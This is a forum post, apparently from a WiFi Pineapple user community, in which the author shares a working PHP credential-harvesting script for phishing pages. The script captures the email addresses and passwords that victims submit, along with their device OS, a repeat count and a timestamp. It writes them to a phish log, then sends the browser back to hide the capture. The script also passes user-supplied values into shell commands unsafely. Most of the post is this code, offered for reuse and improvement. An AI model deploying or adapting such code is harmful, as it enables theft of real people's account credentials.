Jump to content

Recommended Posts

Posted (edited)

Hello guys, i just want to share the error.php file i am using... It's nothing special since my knowledge in php is limited but here it is..

  • When i use the pineapple in real action it doesn't have an internet connection so the "date("G:i:s")" command (line 3) shows the "up time" of the pineapple.
  • The original error.php was posting at the phish.log the entire url wich in my case was something like this:
    http://www.blabla.com/web/files/example1/example1.html . I didn't liked the output of that so i added the first "if" wich changes the final output to this " hh:mm:ss -- Example 1 -- email -- password"
  • I noticed that when the victim could not establish an internet connection he was pressing the "Log in" button again and again with out typing the password and because i dont think someone has a blank password in the websites i "phish" i added the "&& !empty($_POST['pass'])" (line 14) so it wont log any data with blank password.
  • Also not having an internet connection the victim was trying again and again with the same credentials leading to long and difficult to read logs. For this reason i added the third "if".

    EDIT:
  • Added $_SERVER["HTTP_USER_AGENT"] wich detects clients OS
  • Counting how many times the victim uses the same combination email/password

    <?php
    $uptime = date("G:i:s");
    
    
    
    /* =========== Detect the Phishing Page =========== */
    
    $ref = $_SERVER['HTTP_REFERER'];
    if (strpos($ref, "example1")){
        $page = "Example 1";
    
    } elseif (strpos($ref, "example2")){
        $page = "Example 2";
    }
    
    /* ================================================ */
    
    
    
    
    /* ================= Detect the OS ================ */
    
    $ua = $_SERVER["HTTP_USER_AGENT"];
    $platform = "Unknown";
    if (strpos($ua, "Android")) {
        $platform = "Android";
    }
    elseif (strpos($ua, "iPhone")) {
        $platform = "iPhone";
    }
    elseif (strpos($ua, "Windows")) {
        $platform = "Windows";
    }
    elseif (strpos($ua, "BlackBerry")) {
        $platform = "BlackBerry";
    }
    elseif (strpos($ua, "Linux")) {
        $platform = "Linux";
    }
    elseif (strpos($ua, "Macintosh")) {
        $platform = "Macintosh";
    }
    
    /* ================================================ */
    
    
    
    
    
    
    /* ====================== Checking and Saving Data =============================== */
    
    if (isset($_POST['email']) && !empty($_POST['email']) && !empty($_POST['pass'])) {
        $nam = stripslashes($_POST['email']);
        $pas = stripslashes($_POST['pass']);
        $nam = htmlspecialchars($nam, ENT_QUOTES);
        $pas = htmlspecialchars($pas, ENT_QUOTES);
        $cre = $page . "  --  ". $nam . "  --  " . $pas;
    
        $file = file_get_contents("/pineapple/phish.log");
        $count = 1;
    
        if (!strpos($file, $cre)) {
            $content = $cre . "  --  " . $count . "  --  " . $platform . "  --  " . $uptime;
            $filed = @fopen("/pineapple/phish.log", "a+");
            @fwrite($filed, $content."\n");
            @fclose($filed);
        } else {
            $count = exec("awk -F '  --  ' '$0 ~ str{print substr($4,1)}' str='$cre ' /pineapple/phish.log");
            $count = $count + 1;
            exec("sed '/$cre /c \\$cre  --  $count  --  $platform  --  $uptime'  -i /pineapple/phish.log");
    }
    }
    
    /*================================================================================ */
    ?>
    
    
    <html><head>
    <script type="text/javascript">
    function goBack()
    {
    window.history.back()
    }
    </script>
    </head>
    <body onload="goBack()">
    </body></html>
    

I am sure there is a much better and cleaner way to do all this but thats all i got :P. Any suggestions and changes of course are welcomed.

Edited by KiatoG

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...